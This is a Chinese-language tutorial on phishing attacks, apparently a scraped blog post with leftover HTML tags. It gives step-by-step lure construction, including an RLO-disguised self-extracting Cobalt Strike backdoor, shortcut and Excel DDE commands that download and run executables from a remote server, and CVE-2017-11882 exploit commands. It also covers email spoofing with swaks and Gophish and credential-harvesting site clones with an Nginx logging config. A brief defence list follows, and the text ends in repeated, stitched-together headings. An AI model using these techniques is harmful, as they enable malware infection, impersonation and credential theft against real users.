网络钓鱼攻击技术详解<\/h1>

一、网络钓鱼概述<\/h2>
网络钓鱼(Phishing)是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。<\/p>

目标人群选择<\/h3>

HR、销售、文员等安全意识较薄弱的人员<\/li>

运维、开发等掌握重要资源的人员<\/li> <\/ul>

二、高质量鱼饵制作技术<\/h2>

0x01. 自解压+RLO技术<\/h3>

制作思路<\/strong>：利用自解压文件的特性自动执行恶意文件，使用RLO(从右到左覆盖)技术进行文件名伪装。<\/p>

实施步骤<\/strong>：<\/p>

使用Cobalt Strike(CS)生成Windows后门<\/li>
准备一张图片，使用WinRAR将后门和图片一起自解压

解压路径：C:\windows\temp<\/code><\/li>
解压后运行：C:\windows\temp\artifact.exe<\/code>和C:\windows\temp\壁纸.jpg<\/code><\/li>
模式：全部隐藏<\/li>
更新模式：解压并更新文件<\/li>
覆盖模式：覆盖所有文件<\/li> <\/ul> <\/li>
使用Resource Hacker更换文件图标<\/li>
重命名为壁纸gpj.exe<\/code>并使用RLO反转后缀<\/li> <\/ol> 效果<\/strong>：受害者双击"图片"会同时执行后门程序和显示图片<\/p> 0x02. 快捷方式钓鱼<\/h3> 制作思路<\/strong>：通过快捷方式执行命令下载并运行恶意程序。<\/p> 实施步骤<\/strong>：<\/p> CS生成后门并放在服务器上<\/li> 创建快捷方式，目标写入： C:\Windows\System32\cmd.exe \/k curl http:\/\/xxx.xxx.xxx.xxx\/exe\/artifact.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe <\/code><\/pre> <\/li> 更换图标增加真实性<\/li> <\/ol> 0x03. Word宏病毒<\/h3> 原理<\/strong>：利用Word中的VBA宏代码执行恶意行为。<\/p> 实施步骤<\/strong>：<\/p> 使用CS生成恶意VBA代码<\/li> 新建doc文档并创建宏<\/li> 保存文档，受害者启用宏后即上线<\/li> <\/ol> 0x04. Excel注入<\/h3> 原理<\/strong>：利用Excel公式执行系统命令。<\/p> 实施方法<\/strong>：<\/p> 弹出计算器： =cmd| '\/c calc'! '!A1' <\/code><\/pre> <\/li> 上线CS： =cmd| '\/c curl http:\/\/xxx.xxx.xxx.xxx\/beacon.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe' ! 'A1' <\/code><\/pre> <\/li> <\/ul> 0x05. CVE-2017-11882漏洞利用<\/h3> 特点<\/strong>：比宏病毒更隐蔽的Word钓鱼方式。<\/p> 实施步骤<\/strong>：<\/p> 使用POC工具生成恶意doc文件： python2 Command109b_CVE-2017-11882.py -c "cmd.exe \/c calc.exe" -o test.doc <\/code><\/pre> <\/li> 结合MSF使用： python2 Command109b_CVE-2017-11882.py -c "mshta http:\/\/192.168.126.132:8080\/Uf7DGFz.hta" -o 通知文件.doc -i input.rtf <\/code><\/pre> <\/li> <\/ol> 三、邮件伪造技术<\/h2> 1. Swaks工具<\/h3> Kali自带的邮件伪造工具，基本用法：<\/p> swaks --to 目标邮箱 --from 发件人 --ehlo 伪造头 --body 邮件内容 --header "Subject: 标题" --attach 附件 <\/code><\/pre> 2. Gophish工具<\/h3> 开源钓鱼工具包，提供Web面板和完整功能：<\/p> 邮件编辑<\/li> 网站克隆<\/li> 数据可视化<\/li> 批量发送<\/li> <\/ul> 使用场景<\/strong>：<\/p> 伪造中奖通知邮件并发送附件<\/li> 邮件中插入克隆网站(如QQ邮箱登录页面)<\/li> <\/ol> 四、网站克隆技术<\/h2> 1. SEToolkit克隆<\/h3> 步骤<\/strong>：<\/p> 启动setoolkit选择"Social-Engineering Attacks"<\/li> 选择"Website Attack Vectors"<\/li> 选择"Credential Harvester Attack Method"<\/li> 选择"Site Cloner"<\/li> 输入目标网站<\/li> <\/ol> HTA注入攻击<\/strong>：通过克隆站点植入HTA脚本，受害者访问时会触发反弹Shell。<\/p> 2. Nginx反向代理克隆<\/h3> 原理<\/strong>：利用Nginx反向代理功能记录用户提交的凭证。<\/p> 配置要点<\/strong>：<\/p> 在nginx.conf中添加自定义日志格式： log_format Clonelog escape=json '{$remote_addr|' '$request_filename|' '$request_body|' '$http_cookie|' '$http_x_forwarded_for|' '$time_local}'; <\/code><\/pre> <\/li> 配置反向代理服务器： server<\/span> { <\/span><\/span> listen<\/span> 8000<\/span>; <\/span><\/span> server_name<\/span> 127<\/span>.0.0.1<\/span>; <\/span><\/span> access_log<\/span> \/www\/wwwlogs\/access.log<\/span> Clonelog<\/span>; <\/span><\/span> location<\/span> \/<\/span> { <\/span><\/span> proxy_pass<\/span> http:\/\/目标网站<\/span>; <\/span><\/span> proxy_set_header<\/span> Host<\/span> "目标域名"<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 前端页面手动克隆<\/h3> 步骤<\/strong>：<\/p> 使用浏览器"另存为"功能保存目标网站前端代码<\/li> 修改表单提交地址到自己的服务器<\/li> 调整CSS样式确保显示正常<\/li> 编写后端脚本记录凭证<\/li> 购买相似域名增加可信度<\/li> <\/ol> 关键点<\/strong>：<\/p> 确保获取正确的表单字段name值<\/li> 提交后跳转回真实网站保持隐蔽性<\/li> 设计合理的错误提示增加真实性<\/li> <\/ul> 五、防御建议<\/h2> 对可疑邮件附件保持警惕<\/li> 禁用Office宏功能<\/li> 检查文件真实扩展名<\/li> 使用双因素认证<\/li> 定期进行安全意识培训<\/li> 保持系统和软件更新<\/li> 使用专业安全防护软件<\/li> <\/ol> 通过以上技术的组合使用，攻击者可以构建高度逼真的钓鱼攻击链。防御方需要从技术和管理多个层面建立防护体系。<\/p>

网络钓鱼攻击技术详解<\/h1>

一、网络钓鱼概述<\/h2> 网络钓鱼(Phishing)是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。<\/p>

二、高质量鱼饵制作技术<\/h2>

三、邮件伪造技术<\/h2>

四、网站克隆技术<\/h2>

一、网络钓鱼概述<\/h2>
网络钓鱼(Phishing)是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。<\/p>